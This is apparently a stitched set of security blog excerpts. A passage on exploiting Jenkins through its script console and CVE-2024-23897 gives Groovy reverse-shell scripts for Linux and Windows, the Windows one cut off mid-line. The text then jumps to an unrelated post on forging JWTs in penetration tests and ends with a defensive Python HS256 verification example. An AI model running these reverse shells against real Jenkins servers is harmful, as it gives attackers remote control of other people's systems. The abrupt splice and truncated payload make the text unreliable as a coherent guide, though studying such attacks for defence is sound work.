Exploiting Jenkins / CVE-2024-23897

Often the script console is accessible without authentication due to a misconfiguration, at http://JENKINS_IP/script. If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, exploit it to read files and obtain authentication credentials for Jenkins (explained below).

Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.

For Linux:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

For Windows:

String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
JSON Web Token (JWT) is a standard for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed (for example with a public/private key pair). In this post, I will explain what a JWT is and how it can be manipulated to perform certain functions, especially during penetration testing.
Access a website that uses JWTs and open the developer tools in the web browser to see the token. To decode the token, we can use the handy website https://jwt.io: copy the token and paste it into the site to decode it. You can then see the key-value pairs.
If you want to generate your own customized JWT, you can do it in the same way. Create the header and payload data with the fields you want. The jwt.io site encodes and signs the token with the key pair (or secret) you supply. Then copy the encoded token and re-send it to the target website to perform the manipulation.
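As an added example (not code from the original post) of what the signature actually protects, here is a minimal HS256 issuer and verifier written only with the Python standard library; the secret and the claims are constructed for the demo. It shows that both edits described above, changing the payload in jwt.io while keeping the old signature, and re-signing with a guessed secret, are rejected by a verifier that pins the algorithm and recomputes the HMAC.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret; a real server keeps its HMAC secret out of the code.
SECRET = b"demo-secret-not-for-production"

def b64url_encode(data: bytes) -> str:
    # Base64url without '=' padding, as RFC 7515 requires
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(segment: str) -> bytes:
    # Restore the stripped padding before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def decode_unverified(token: str):
    # What jwt.io shows: header and payload are only base64url-encoded, not encrypted
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def sign_hs256(payload: dict, secret: bytes) -> str:
    # header.payload, then an HMAC-SHA256 over exactly those bytes
    compact = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = compact({"alg": "HS256", "typ": "JWT"}) + "." + compact(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify_hs256(token: str, secret: bytes):
    # Server-side check: pin the algorithm, recompute the HMAC, compare in constant time
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":  # never trust the client's alg
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))

def demo() -> dict:
    # Issue a token, then apply the two edits a tester would make in jwt.io
    token = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    header_b64, _payload, sig_b64 = token.split(".")
    tampered = ".".join([header_b64, b64url_encode(b'{"sub":"alice","role":"admin"}'), sig_b64])
    forged = sign_hs256({"sub": "alice", "role": "admin"}, b"guessed-secret")  # wrong key
    return {"valid_accepted": verify_hs256(token, SECRET) == {"sub": "alice", "role": "user"},
            "edited_payload_rejected": verify_hs256(tampered, SECRET) is None,
            "resigned_wrong_key_rejected": verify_hs256(forged, SECRET) is None}
```

Note that decode_unverified still reads the edited payload without any key: the signature stops a tampered token from being accepted, not from being read.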